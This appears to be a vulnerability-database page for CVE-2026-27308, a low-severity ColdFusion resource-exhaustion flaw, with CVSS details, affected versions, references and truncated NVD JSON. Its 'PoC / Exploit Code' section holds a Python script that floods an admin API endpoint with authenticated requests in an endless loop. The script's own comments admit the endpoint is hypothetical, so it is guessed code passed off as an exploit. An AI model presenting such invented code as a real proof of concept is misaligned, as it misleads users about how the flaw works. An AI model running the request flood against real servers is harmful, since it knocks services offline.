CVE-2026-27308

Description

ColdFusion versions 2023.18, 2025.6 and earlier are affected by an Uncontrolled Resource Consumption vulnerability that could lead to application denial-of-service. A high-privileged attacker could exploit this vulnerability and exhaust system resources, reducing application speed. Exploitation of this issue does not require user interaction.

CVSS Details

CVSS Score

2.4

Severity

LOW

CVSS Vector

CVSS:3.1/AV:A/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:L

Configurations (Affected Products)

cpe:2.3:a:adobe:coldfusion:2023:-:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:adobe:coldfusion:2023:update1:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:adobe:coldfusion:2023:update10:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:adobe:coldfusion:2023:update11:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:adobe:coldfusion:2023:update12:*:*:*:*:*:* - VULNERABLE

Adobe ColdFusion 2023 <= 2023.18

Adobe ColdFusion 2025 <= 2025.6

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/usr/bin/env python3
import requests

def cve_2026_27308_poc(target_url, session_cookie):
    """
    Proof of Concept for CVE-2026-27308 (Adobe ColdFusion).
    This script attempts to exhaust system resources by sending
    repeated requests to a vulnerable endpoint.
    
    Note: Requires High Privileges (Admin Session).
    """
    headers = {
        "Cookie": session_cookie,
        "User-Agent": "CVE-2026-27308-POC/1.0"
    }
    
    # Hypothetical endpoint that triggers resource consumption
    # Based on the vulnerability description
    endpoint = f"{target_url}/CFIDE/adminapi/vulnerable_endpoint.cfm"
    
    print(f"[+] Targeting: {target_url}")
    print(f"[+] Attacking endpoint: {endpoint}")
    print(f"[!] Attempting to exhaust resources...")
    
    try:
        # Infinite loop to simulate resource exhaustion attack
        while True:
            response = requests.get(endpoint, headers=headers, timeout=10)
            if response.status_code == 200:
                print("[+] Request sent, consuming resources...")
            else:
                print(f"[-] Unexpected status code: {response.status_code}")
                break
    except KeyboardInterrupt:
        print("\n[-] Exploitation stopped by user.")
    except requests.exceptions.RequestException as e:
        print(f"[-] Request failed: {e}")

if __name__ == "__main__":
    # Replace with actual target and admin session cookie
    target = "http://127.0.0.1:8500"
    cookie = "CFAUTHORIZATION_cfadmin=..." 
    cve_2026_27308_poc(target, cookie)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-27308
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-27308
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-27308/
[4] VulDB https://vuldb.com/cve/CVE-2026-27308
[5] https://helpx.adobe.com/security/products/coldfusion/apsb26-38.html

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-27308", "sourceIdentifier": "[email protected]", "published": "2026-04-14T22:16:30.050", "lastModified": "2026-04-16T14:40:42.827", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "ColdFusion versions 2023.18, 2025.6 and earlier are affected by an Uncontrolled Resource Consumption vulnerability that could lead to application denial-of-service. A high-privileged attacker could exploit this vulnerability and exhaust system resources, reducing application speed. Exploitation of this issue does not require user interaction."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:L", "baseScore": 2.4, "baseSeverity": "LOW", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 0.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-400"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:adobe:coldfusion:2023:-:*:*:*:*:*:*", "matchCriteriaId": "B02A37FE-5D31-4892-A3E6-156A8FE62D28"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:coldfusion:2023:update1:*:*:*:*:*:*", "matchCriteriaId": "0AA3D302-CFEE-4DFD-AB92-F53C87721BFF"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:coldfusion:2023:update10:*:*:*:*:*:*", "matchCriteriaId": "645D1B5F-2DAB-4AB8-A465-AC37FF494F95"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:coldfusion:2023:update11:*:*:*:*:*:*", "matchCriteriaId": "ED6D8996-0770-4C9F-BEA5-87EA479D40A5"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:coldfusion:2023:update12:*:*:*:*:*:*", "matchCriteriaId": "4836086E-3D4A-4A07-A372-382D385CB490"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:coldfusion:2023:update13:*:*:*:*:*:*", "matchCriteriaId": "CBC19168-4184-4B59-B9C8-E98844124EED"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:coldfusion:2023:update14:*:*:*:*:*:*", "matchCriteriaId": "A60DCD92-9A5B-411C-9554-642C91D77FAE"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:coldfusion:2023:update15:*:*:*:*:*:*", "matchCriteriaId": "58CC65EF-60A3-4DFA-AA51-E5013F116CEA"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:coldfusion:2023:update16:*:*:*:*:*:*", "matchCriteriaId": "2E3EBFB1-4488-4924-A2E2-B7E422D68345"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:coldfusion:2023:update17:*:*:*:*:*:*", "matchCriteriaId": "A683F9B2-A0DC-4AA0-BE97-9E74FA200AB1"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:coldfusion:2023:update18:*:*:*:*:*:*", "matchCriteriaId": "8689F35F-9A81-45D2-B782-DBA12306BA45"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:coldfusion:2023:update2:*:*:*:*:*:*", "matchCriteriaId": "EB88D4FE-5496-4639-BAF2-9F29F24ABF29"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:coldfusion:2023:update3:*:*:*:*:*:*", "matchCriteriaId": "43E0ED98-2C1F-40B8-AF60-FEB1D85619C0"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:coldfusion:2023:update4:*:*:*:*:*:*", "matchCriteriaId": "76204873-C6E0-4202-8A03-0773270F1802"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:coldfusion:2023:update5:*:*:*:*:*:*", "matchCriteriaId": "C1A22BE9-0D47-4BA8-8BDB-9B12D7A0F7C7"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:coldfusion:2023:update6:*:*:*:*:*:*", "matchCriteriaId": "E3A83642-BF14-4C37-BD94-FA76AABE8ADC"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:coldfusion:2023:update7:*:*:*:*:*:*", "matchCriteriaId": "A892E1DC-F2C8-4F53-8580-A2D1BEED5A25"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:coldfusion:2023:update8:*:*:*:*:*:*", "matchCriteriaId": "DB97ADBA-C1A9-4EE0-9509-68CB12358AE5"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:coldfusion:2023:update9:*:*:*:*:*:*", "matchCriteriaId": "E17C38F0-9B0F-4433-9CBD-6E3D63EA9BDC"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:coldfusion:2025:-:*:*:*:*:*:*", "matchCriteriaId": "30779417-D4E5-4A01-BE0E-1CE1D134292A"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:coldfusion:2025:update1:*:*:*:*:*:*", "matchCriteriaId": "80D7FC6A-F264-4CB1-A18D-B091EBA47882"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:coldfusion:2025:update2:*:*:*:*:*:*", "matchCriteriaId": "E3DA0D20-93BA-4C76-A400-159853CD7277"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:coldfusion:2025:update3:*:*:*:*:*:*", "matchCriteriaId": "5BAB6F21-61F1-43AB-88BA-553CD9AD6C0E"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:coldfusion:2025:update4:*:*:*:*:*:*", "matchCriteriaId": "C85288B9-5D63-49EA-828A-8DB3BB2367F6"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:coldfusion:2025:update5:*:*:*:*:*:*", "matchCriteriaId": "3882A011-5A01-48E7-B5E7-5A837B1CE245"}, {"vulnerable": true, ... (truncated)